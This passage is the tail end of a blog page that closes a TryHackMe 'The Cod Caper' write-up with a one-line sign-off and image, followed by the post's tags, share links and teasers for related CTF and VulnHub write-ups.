</pre></table></code></div></div><p>Finally pingu will be having quite a dinner with those fishes. <img data-src="/assets/img/THM/The_Cod_Caper/pingu.jpg" alt="Job Done" data-proofer-ignore></p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/thm/'>THM</a>, <a href='/categories/binaryexploitation/'>BinaryExploitation</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/pwn/" class="post-tag no-text-decoration" >pwn</a> <a href="/tags/pwntools/" class="post-tag no-text-decoration" >pwntools</a> <a href="/tags/reversing/" class="post-tag no-text-decoration" >Reversing</a> <a href="/tags/security/" class="post-tag no-text-decoration" >security</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/"> CC BY 4.0 </a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=The+Cod+Caper+%7C+TryHackMe+-+Muhammad+Iqbal&url=https%3A%2F%2Fiamiqbal.github.io%2F%2Fposts%2FThe-Cod-Caper%2F" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=The+Cod+Caper+%7C+TryHackMe+-+Muhammad+Iqbal&u=https%3A%2F%2Fiamiqbal.github.io%2F%2Fposts%2FThe-Cod-Caper%2F" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://t.me/share/url?url=https%3A%2F%2Fiamiqbal.github.io%2F%2Fposts%2FThe-Cod-Caper%2F&text=The+Cod+Caper+%7C+TryHackMe+-+Muhammad+Iqbal" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <i id="copy-link" class="fa-fw fas fa-link small" data-toggle="tooltip" data-placement="top" title="Copy link" data-title-succeed="Link copied successfully!"> </i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted"><div class="access"><div id="access-lastmod" class="post"><div class="panel-heading">Recently Updated</div><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/The-Cod-Caper/">The Cod Caper | TryHackMe</a><li><a href="/posts/HydraChallenge/">The Hydra Corp | Arab CyberSecurity WarGames CTF</a></ul></div><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/exiftool/">exiftool</a> <a class="post-tag" href="/tags/osint/">OSINT</a> <a class="post-tag" href="/tags/privilege-escalation/">Privilege escalation</a> <a class="post-tag" href="/tags/pwn/">pwn</a> <a class="post-tag" href="/tags/pwntools/">pwntools</a> <a class="post-tag" href="/tags/reconnaissance/">Reconnaissance</a> <a class="post-tag" href="/tags/reversing/">Reversing</a> <a class="post-tag" href="/tags/security/">security</a> <a class="post-tag" href="/tags/security/">Security</a> <a class="post-tag" href="/tags/wordpress/">Wordpress</a></div></div></div><script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><div class="panel-heading pl-3 pt-2 mb-2">Contents</div><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 pl-3 pr-3 pr-xl-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/Mr-Robot/"><div class="card-body"> <em class="small" data-ts="1754046000" data-df="ll" > Aug 1, 2025 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Mr Robot | Vuln Hub</h3><div class="text-muted small"><p> Hello Again! I am starting a series of writeups in which I’ll cover walkthroughs of VulnHub machines. The difficulties will range from Easy to Hard. Task 1: Intro Note: This machine is based...</p></div></div></a></div><div class="card"> <a href="/posts/HydraChallenge/"><div class="card-body"> <em class="small" data-ts="1659762000" data-df="ll" > Aug 6, 2022 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>The Hydra Corp | Arab CyberSecurity WarGames CTF</h3><div class="text-muted small"><p> This is the writeup for Hydra Corp Challenge of Arab CyberSecurity Wargames CTF. It was a 900 pts challenge. Challenge Description The world has become an unsafe place and has become full of ...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"><div class="btn btn-outline-primary disabled" prompt="Older"><p>-</p></div><a href="/posts/HydraChallenge/" class="btn btn-outline-primary" prompt="Newer"><p>The Hydra Corp | Arab CyberSecurity WarGames CTF</p></a></div></div></div><footer class="row pl-3 pr-3"><div class="col-12 d-flex justify-content-between align-items-center text-muted pl-0 pr-0"><div class="footer-left"><p class="mb-0"> © 2025 <a href="https://twitter.com/0xiqb4l">Muhammad Iqbal</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/exiftool/">exiftool</a> <a class="post-tag" href="/tags/osint/">OSINT</a> <a class="post-tag" href="/tags/privilege-escalation/">Privilege escalation</a> <a class="post-tag" href="/tags/pwn/">pwn</a> <a class="post-tag" href="/tags/pwntools/">pwntools</a> <a class="post-tag" href="/tags/reconnaissance/">Reconnaissance</a> <a class="post-tag" href="/tags/reversing/">Reversing</a> <a class="post-tag" href="/tags/security/">security</a> <a class="post-tag" href="/tags/security/">Security</a> <a class="post-tag" href="/tags/wordpress/">Wordpress</a></div></div></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a><div id="notification" class="toast" role="alert" aria-live="assertive" aria-atomic="true" data-animation="true" data-autohide="false"><div class="toast-header"> <button type="button" class="ml-2 ml-auto close" data-dismiss="toast" aria-label="Close"> <span aria-hidden="true">&times;</span> </button></div><div class="toast-body text-center pt-0"><p class="pl-2 pr-2 mb-3">A new version of content is available.</p><button type="button" class="btn btn-primary" aria-label="Update"> Update </button></div></div><script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No results found.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script> <script src="https://cdn.jsdelivr.net/combine/npm/magnific-popup@1/dist/jquery.magnific-popup.min.js,npm/lozad/dist/lozad.min.js,npm/clipboard@2/dist/clipboard.min.js"></script> <script src="https://cdn.jsdelivr.net/combine/npm/dayjs@1/dayjs.min.js,npm/dayjs@1/locale/en.min.js,npm/dayjs@1/plugin/relativeTime.min.js,npm/dayjs@1/plugin/localizedFormat.min.js"></script> <script defer src="/assets/js/dist/post.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.bundle.min.js"></script> <script defer src="/app.js"></script>
